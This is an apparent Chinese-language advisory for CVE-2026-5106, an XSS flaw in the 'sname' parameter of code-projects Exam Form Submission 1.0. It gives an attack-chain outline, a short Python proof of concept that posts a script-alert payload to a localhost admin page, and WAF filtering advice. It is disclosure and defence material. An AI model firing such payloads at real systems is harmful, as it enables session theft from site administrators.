CVE-2026-5106: Exam Form Submission跨站脚本漏洞

漏洞信息

漏洞编号

CVE-2026-5106

漏洞类型

跨站脚本 (XSS)

CVSS评分

2.4 低危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

需要交互 (UI:R)

影响产品

code-projects Exam Form Submission

漏洞概述

code-projects Exam Form Submission 1.0版本中被发现存在一处安全漏洞。该漏洞位于应用程序后台管理系统的`/admin/update_fst.php`文件中，主要原因是未对`sname`参数进行有效的输入过滤。攻击者可以通过操纵该参数注入恶意脚本，从而触发跨站脚本攻击（XSS）。尽管该漏洞的利用需要较高的权限（管理员级别）和用户交互，且CVSS评分较低，但由于攻击可远程发起且已有公开利用代码，它依然对系统的数据完整性构成潜在威胁，可能导致管理员会话被劫持。

技术细节

该漏洞的技术原理源于Web应用程序中典型的输入验证缺失问题。在code-projects Exam Form Submission 1.0的实现中，`/admin/update_fst.php`文件负责处理表单更新逻辑，但在处理`sname`参数时，未实施任何有效的输出编码或输入过滤机制。根据CVSS 3.1向量分析，该漏洞的利用需要高权限（PR:H）及用户交互（UI:R），这通常意味着攻击者需要诱导管理员用户访问特定链接或查看受污染的数据。

具体利用方式涉及构造包含恶意JavaScript代码的HTTP请求（例如在`sname`参数中插入Payload）。由于后端未进行转义，当管理员浏览器加载包含该参数的响应页面时，恶意脚本将被解析执行。虽然该漏洞对机密性和可用性无直接影响，但其破坏了数据完整性（I:L），攻击者可利用此漏洞进行钓鱼攻击或窃取敏感的会话令牌。鉴于漏洞利用代码已公开，风险不容忽视。

攻击链分析

STEP 1

侦察阶段

攻击者识别目标系统运行的是code-projects Exam Form Submission 1.0，并确定`/admin/update_fst.php`接口存在输入验证缺陷。

STEP 2

获取权限

由于CVSS向量显示PR:H（高权限），攻击者需要通过其他手段获取管理员账户凭证，或诱导管理员执行操作。

STEP 3

漏洞利用

攻击者构造包含恶意JavaScript代码的`sname`参数，向`/admin/update_fst.php`发送POST请求，将恶意载荷注入系统。

STEP 4

触发执行

当管理员或其他高权限用户访问受影响的页面或查看被污染的数据时（UI:R），浏览器解析并执行注入的脚本。

STEP 5

达成目标

恶意脚本执行，可能导致页面内容被篡改或管理员Cookie被窃取，影响系统数据完整性。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL configuration
target_url = "http://localhost/admin/update_fst.php"

# Malicious payload to test XSS
xss_payload = "<script>alert('CVE-2026-5106');</script>"

# Data to be sent in the POST request
# 'sname' is the vulnerable parameter identified in the CVE description
post_data = {
    "sname": xss_payload,
    # Include other necessary parameters as required by the form (e.g., ID, other fields)
    # "id": "1"
}

try:
    # Sending the POST request
    response = requests.post(target_url, data=post_data)

    # Check if the request was successful
    if response.status_code == 200:
        print("[+] Payload sent successfully.")
        print("[+] Check the application response to verify XSS execution.")
    else:
        print(f"[-] Request failed with status code: {response.status_code}")

except Exception as e:
    print(f"[-] An error occurred: {e}")

影响范围

code-projects Exam Form Submission 1.0

防御指南

临时缓解措施

在未获得官方修复补丁前，建议暂时限制对`/admin/update_fst.php`文件的访问权限，或通过WAF规则对传入的`sname`参数进行深度检测，拦截包含常见XSS特征（如`<script>`, `onerror=`等）的请求。同时，应加强对管理员账户的安全意识培训，避免点击不明链接或访问可疑页面，以防止触发需要用户交互的攻击载荷。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-5106
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-5106
3 Details https://www.cvedetails.com/cve/CVE-2026-5106/
4 VulDB https://vuldb.com/cve/CVE-2026-5106
5 Link https://code-projects.org/
6 Link https://github.com/sxc2044-pixel/hajimi/issues/1
7 Link https://vuldb.com/submit/780091
8 Link https://vuldb.com/vuln/354131
9 Link https://vuldb.com/vuln/354131/cti